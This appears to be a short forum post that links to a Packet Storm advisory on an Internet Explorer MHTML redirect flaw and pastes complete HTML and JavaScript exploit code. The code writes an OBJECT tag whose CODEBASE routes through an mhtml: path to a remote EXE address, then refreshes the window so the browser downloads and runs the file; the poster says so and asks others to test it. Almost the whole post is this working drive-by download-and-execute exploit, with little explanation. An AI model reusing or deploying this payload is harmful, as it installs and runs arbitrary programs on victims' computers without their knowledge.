http://packetstormse.../mhtmlredir.txt
do you know this vulnerbility? i've found some html code for this:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<script>
WaitForDocumentCached_TIME=100;
function LaunchRemoteExe_Step2()
{
//One more fresh action is present for more stable performance
for(i=1;i<=2;i++)
w.document.execCommand("Refresh");
}
function LaunchRemoteExe(ExeUrl)
{
w=window.open("about:blank","_blank","width=300 height=400 resizable=yes location=yes");
w.document.write("<OBJECT NAME='X' CLASSID='CLSID:11111111-1111-1111-1111-111111111113' CODEBASE='mhtml:file://C:\NO_SUCH_MHT.MHT!" + ExeUrl + "'>");
setTimeout("LaunchRemoteExe_Step2()",WaitForDocumentCached_TIME);
}
LaunchRemoteExe("http://127.0.0.1/EXE.EXE") <!-- and end it with -->
</script>
</head>
<body>
</body>
</html>it will download and execute exe.exe from http://127.0.0.1/.
can someone test this code. i dont have the ie :rolleyes:

Sign In
Register
Help
MultiQuote